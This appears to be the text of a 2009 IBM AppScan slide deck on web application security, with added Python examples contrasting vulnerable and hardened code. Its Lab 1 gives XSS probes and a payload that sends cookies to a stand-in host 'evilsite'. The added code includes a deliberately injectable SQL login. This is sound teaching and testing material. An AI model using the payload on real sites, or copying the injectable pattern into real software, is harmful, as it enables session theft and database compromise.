IBM Software Group
Rational AppScan & Ounce Products
Discovering the Value of Web Application Security Testing with IBM Rational AppScan
Presenters: Tony Sisson and Frank Sassano
Wednesday, September 16, 2009
© 2009 IBM Corporation
The Alarming Truth
• CheckFree: 'warns 5 million customers after hack'
  http://infosecurity.us/?p=5168 (January 9, 2009)
• Hannaford Bros. Grocery Chain: '4 million credit & debit cards exposed'
  http://www.cnn.com/2008/US/03/18/retail.data.breach.ap/index.html (March 18, 2008)
• Montgomery Ward: '51,000 customer credit card numbers...'
  http://www.scmagazineus.com/Report-Montgomery-Ward-fails-to-alert-victims-of-breach/article/111922/ (June 27, 2008)
• Target Stores: 'Blind users win $6M suit; Target to make website accessible'
  http://digg.com/tech_news/Blind_Users_Win_6M_Suit_Target_To_Make_Website_Accessible (2008)
Bad Press Decreases Shareholder Value
One-day market cap drop of $200M
The Reality: Security and Focus Are Unbalanced
                    % of Attacks    % of Dollars (Security Spending)
Web Applications        75%              10%
Network Server          25%              90%
75% of all attacks on information security are directed to the web application layer
2/3 of all web applications are vulnerable
The Myth: "Our Site Is Safe"
• We have firewalls in place
• We audit it once a quarter with pen testers
• We use network vulnerability scanners
High Level Web Application Architecture Review
Client Tier (Browser) -- Internet -- Firewall -- Middle Tier: App Server (Presentation, Business Logic) -- Data Tier: Database
• Firewall: protects the network
• SSL: protects the transport
• Customer app is deployed on the app server (middle tier)
• Sensitive data is stored in the database (data tier)
Network Defenses for Web Applications
An HTTP request to the application passes through the perimeter defenses:
• Firewall
• IDS (Intrusion Detection System)
• IPS (Intrusion Prevention System)
• App Firewall (Application Firewall)
• System Incident Event Management (SIEM)
These defenses are designed to "fail securely" by allowing through traffic that they don't understand.
Security Testing Technologies Primer
Static Code Analysis = Whitebox
– Looking at the code for security issues (code-level scanning)
Dynamic Analysis = Blackbox
– Sending tests to a functioning application
(Diagram: of the total potential security issues, dynamic analysis and static analysis each cover a part, with some overlap between the two.)
Building Security & Compliance into the SDLC
Coding (Developers) -> Build (Developers) -> QA (Developers) -> Security -> Production
• Enable Security to effectively drive remediation into development
• Provide developers and testers with expertise on detection and remediation ability
• Ensure vulnerabilities are addressed before applications are put into production
Rational AppScan End-to-End Web Application Security
Lifecycle phases: REQUIREMENTS – CODE – BUILD – QA – SECURITY – PRODUCTION
• Requirements: Req'ts Definition (security templates) – security requirements defined before design & implementation; address security from the start
• Code: Ounce Products – Eclipse/VS IDE – build security testing into the IDE*; security for the development lifecycle
• Build: automate security / compliance testing in the build process
• QA: AppScan Tester (scan agent & clients) – security / compliance testing incorporated into testing & remediation workflows
• Security: AppScan Standard (desktop) – security audit solutions for IT Security; testing, oversight, control, policy, audits
• Production: AppScan OnDemand (SaaS) – outsourced testing for security audits & production site monitoring
• Across the lifecycle: AppScan Enterprise / Reporting Console (enterprise-wide scanning and reporting); Application Security Best Practices
Open Web Application Security Project (OWASP) Top 10
Application Threat | Negative Impact | Example Impact
Cross-Site Scripting | Identity theft, sensitive information leakage, ... | Hackers can impersonate legitimate users and control their accounts.
Injection Flaws | Attacker can manipulate queries to the DB / LDAP / other system | Hackers can access backend database information, alter it or steal it.
Malicious File Execution | Execute shell commands on server, up to full control | Site modified to transfer all interactions to the hacker.
Insecure Direct Object Reference | Attacker can access sensitive files and resources | Web application returns contents of sensitive file (instead of harmless one).
Cross-Site Request Forgery | Attacker can invoke "blind" actions on web applications, impersonating a trusted user | Blind requests to bank account transfer money to hacker.
Information Leakage and Improper Error Handling | Attackers can gain detailed system information | Malicious system reconnaissance may assist in developing further attacks.
Broken Authentication & Session Management | Session tokens not guarded or invalidated properly | Hacker can "force" session token on victim; session tokens can be stolen after logout.
Insecure Cryptographic Storage | Weak encryption techniques may lead to broken encryption | Confidential information (SSN, credit cards) can be decrypted by malicious users.
Insecure Communications | Sensitive info sent unencrypted over insecure channel | Unencrypted credentials "sniffed" and used by hacker to impersonate user.
Failure to Restrict URL Access | Hacker can access unauthorized resources | Hacker can forcefully browse and access a page past the login page.
Cross-Site Scripting – The Exploit Process
Parties: Evil.org, User, bank.com
1) Link to bank.com sent to user via e-mail or HTTP
2) User sends script embedded as data
3) Script/data returned, executed by browser
4) Script sends user's cookie and session information without the user's consent or knowledge
5) Evil.org uses stolen session information to impersonate user
Lab 1: Profile Web Application, Steal Cookies
The goal of this lab is to:
• profile the demo.testfire.net application
• utilize a Cross-Site Scripting vulnerability on the demo.testfire.net application in order to access cookies on a target user's browser
Search inputs tried, in order: Super Bowl -> <B>Super Bowl</B> -> <script>alert(1)</script> -> <script>alert(document.cookie)</script>
Tamperdata – for gathering the cookie information to send to Grandma!
– SEARCH - <script>document.write('<img src=http://evilsite/'+document.cookie);</script>
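The defender's side of the five-step exploit process and of Lab 1, as an added Python example that is not the deck's code and not demo.testfire.net's code: a reflected search page built the vulnerable way (raw term dropped into HTML, so step 3 executes whatever step 2 sent) beside the hardened way (HTML-encoded before reflection), plus the cookie flags that blunt step 4 even when an XSS slips through. The page template, the function names and the session id value are constructed for the demo; the cookie name ASP.NET_SessionId is the one ASP.NET uses.

```python
import html

# Constructed page template for the demo; the real demo.testfire.net markup is not reproduced.
PAGE = "<html><body><h1>Search results for: {term}</h1><p>No results found.</p></body></html>"


def render_search_vulnerable(term: str) -> str:
    """'Before': the raw search term is dropped straight into the HTML.

    Whatever the link carried (step 2 of the exploit process) comes back
    unchanged (step 3) and the browser runs it as part of the page."""
    return PAGE.format(term=term)


def render_search_hardened(term: str) -> str:
    """'After': the term is encoded for the HTML body context before reflection.

    html.escape turns <, >, &, " and ' into entities, so the browser shows
    the text of the payload instead of executing it."""
    return PAGE.format(term=html.escape(term, quote=True))


def session_cookie_header(session_id: str) -> str:
    """Cookie flags that limit step 4 (cookie exfiltration) even if an XSS exists.

    HttpOnly hides the cookie from document.cookie; Secure keeps it off plain
    HTTP; SameSite=Lax limits cross-site sending.  The session id is a placeholder."""
    return (f"Set-Cookie: ASP.NET_SessionId={session_id}; "
            "HttpOnly; Secure; SameSite=Lax; Path=/")


def reflects_unencoded(body: str, marker: str) -> bool:
    """The check a dynamic scanner makes: did the probe come back byte-for-byte?"""
    return marker in body


if __name__ == "__main__":
    probe = "<script>alert(document.cookie)</script>"   # the lab's own test string
    for name, render in (("vulnerable", render_search_vulnerable),
                         ("hardened", render_search_hardened)):
        print(name, "reflects unencoded:", reflects_unencoded(render(probe), probe))
    print(session_cookie_header("PLACEHOLDER-SESSION-ID"))
```

Encoding is context-specific: html.escape is right for text between tags and inside quoted attributes, but a value placed into a JavaScript block or a URL needs the encoding for that context instead.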
SQL Injection Example
(Four screenshot slides: the injection example, the exploit and its outcome. The images are not reproduced here.)
Information Leakage – Different User/Pass Error
(Screenshot: verbose login error messages that differ depending on whether the user name or the password was wrong. The image is not reproduced here.)
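The SQL injection slides and the information-leakage slide both concern the login form, so one added Python example serves both; it is not the deck's code and not demo.testfire.net's code. It builds a login routine two ways over a constructed in-memory SQLite table (user names and passwords made up): the vulnerable version pastes the user name into the SQL text and answers with a different message for an unknown user than for a wrong password, the hardened version binds parameters and returns one uniform failure message. The hashing helper is a placeholder, not a recommendation.

```python
import hashlib
import hmac
import sqlite3


def _hash(password: str) -> str:
    # Placeholder hashing for the demo only; production code uses a salted, slow KDF.
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def build_db() -> sqlite3.Connection:
    """Constructed in-memory user table; names and passwords are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("jsmith", _hash("demo1234")), ("admin", _hash("s3cret!"))])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> str:
    """'Before': string-built SQL plus error messages that differ per failure cause."""
    # The user name becomes part of the query text, so quotes and comment
    # markers inside it change the meaning of the SQL (injection flaw).
    exists = conn.execute(
        f"SELECT 1 FROM users WHERE username = '{username}'").fetchone()
    if exists is None:
        return "Unknown user name"             # tells the caller the account does not exist
    row = conn.execute(
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND pw_hash = '{_hash(password)}'").fetchone()
    if row is None:
        return "Wrong password for this user"  # tells the caller the account does exist
    return "OK: " + row[0]


GENERIC_ERROR = "Login failed"


def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> str:
    """'After': parameter binding and a single failure message."""
    # The driver passes the value separately from the SQL text, so the
    # user name can never alter the query's structure.
    row = conn.execute("SELECT pw_hash FROM users WHERE username = ?",
                       (username,)).fetchone()
    # Compare against a dummy hash when the user is unknown so both failure
    # paths do the same work; the message is identical either way, which is
    # what stops valid accounts from being enumerated through the login form.
    stored = row[0] if row is not None else _hash("")
    if row is None or not hmac.compare_digest(stored, _hash(password)):
        return GENERIC_ERROR
    return "OK: " + username


if __name__ == "__main__":
    db = build_db()
    for user, pw in (("jsmith", "demo1234"), ("nobody", "x"), ("jsmith", "x")):
        print(f"{user!r}: vulnerable={login_vulnerable(db, user, pw)!r} "
              f"hardened={login_hardened(db, user, pw)!r}")
```

The same detail that a scanner reports as "different user/pass error" is what makes the vulnerable version an enumeration oracle: the attacker needs only the first query's answer, not a valid password, to learn which accounts exist.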
Failure to Restrict URL Access – Admin User Login / Privilege Escalation Example
/admin/admin.aspx
Forcefully browse to admin page
(Screenshots of the admin login and the directly requested admin page are not reproduced here.)
AppScan's HTTP-Based Malware Scanning
IBM Confidential
1. Discover all content and links in a Web Application
   – Execute JavaScript & Flash
   – Fill forms and login sequences
   – Analyze secure pages
   – ...
2. Analyze all content for malicious behavior indicators
3. Compare all links to comprehensive black-lists
(Diagram: the discovered links link1, link2, link3 are checked against the black-lists.)
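A miniature of the three scanning steps on this slide, as an added Python example that is not AppScan's code: step 1 collects every href/src from a crawled page, step 2 flags two classic indicators of an injected redirector (a zero-size or hidden iframe, and a meta refresh to another host), and step 3 checks each link's host and its parent domains against a blocklist. The blocklist entries, the base URL and the sample page are constructed for the demo; a real scanner would execute scripts and use maintained feeds, which this example does not.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed blocklist of domains; real scanners use maintained feeds.
BLOCKLIST = {"evilsite.example", "malware-cdn.example"}


def hostname_of(url: str) -> str:
    """Lower-cased host with port, credentials and any trailing dot removed."""
    host = urlsplit(url).hostname or ""
    return host.rstrip(".")


def host_blocked(url: str, blocklist=BLOCKLIST) -> bool:
    """Step 3: match the host or any parent domain, never a bare substring,
    so sub.evilsite.example is caught while notevilsite.example is not."""
    labels = hostname_of(url).split(".")
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels)))


def _is_hidden(attrs: dict) -> bool:
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return (attrs.get("width") == "0" or attrs.get("height") == "0"
            or "display:none" in style or "visibility:hidden" in style)


class PageScanner(HTMLParser):
    """Step 1 collects every href/src; step 2 records behaviour indicators."""

    def __init__(self, base_url: str):
        super().__init__()
        self.base_url = base_url
        self.links = []        # absolute URLs found on the page
        self.indicators = []   # human-readable indicator descriptions

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        for key in ("href", "src"):
            if a.get(key):
                self.links.append(urljoin(self.base_url, a[key]))
        if tag == "iframe" and _is_hidden(a):
            self.indicators.append(f"hidden iframe -> {a.get('src')}")
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            content = a.get("content") or ""
            idx = content.lower().find("url=")
            target = content[idx + 4:].strip() if idx >= 0 else ""
            if target:
                full = urljoin(self.base_url, target)
                if hostname_of(full) != hostname_of(self.base_url):
                    self.indicators.append(f"off-site meta refresh -> {full}")


def scan_page(base_url: str, page_html: str, blocklist=BLOCKLIST) -> dict:
    """Run steps 1-3 over one crawled response and return the findings."""
    scanner = PageScanner(base_url)
    scanner.feed(page_html)
    return {
        "links": scanner.links,
        "blocked": [u for u in scanner.links if host_blocked(u, blocklist)],
        "indicators": scanner.indicators,
    }


# Constructed sample page standing in for a crawled response.
BASE_URL = "http://www.bank.example/"
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0;url=http://landing.evilsite.example/go">
</head><body>
<a href="/bank/login.aspx">Login</a>
<a href="http://EvilSite.example/track">Promotion</a>
<img src="https://cdn.malware-cdn.example/pixel.gif">
<iframe src="http://static.evilsite.example/x" width="0" height="0"></iframe>
<script src="/js/app.js"></script>
</body></html>"""


if __name__ == "__main__":
    for key, values in scan_page(BASE_URL, SAMPLE_HTML).items():
        print(key)
        for v in values:
            print("  ", v)
```

The domain-suffix match in host_blocked is the part worth copying: comparing whole labels from the right avoids both misses on subdomains and false hits on look-alike names that merely contain a listed domain as a substring.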
Introducing expanded Rational AppScan OnDemand
AppScan / Policy Tester OnDemand:
• Comprehensive testing of pre-production applications
• Periodic assessment of applications in QA or Security
• Monthly scans
• Flexible offerings (Small/Medium/Large)
AppScan Tester OnDemand Production Site Monitoring:
• Continuous scanning of production Web sites for vulnerabilities that may have been introduced after the app went live
• Dynamic or interactive content and forms, online registrations
• Weekly scans
The Result: Ability to address online risk without in-house resources, with the faster route to actionable information
IBM Software Group | Watchfire Solutions, © 2008 IBM Corporation
The Impact of Securing Flash-based Applications
• Flash is one of the fastest growing security problems; it is present in practically every web application
• Flash vulnerabilities: Cross-Site Flashing, Cross-Site Scripting through Flash, Phishing, Flow Manipulation
• Flex: the "Next-Generation" of Flash
• A "marketing" Flash banner compromises the entire web application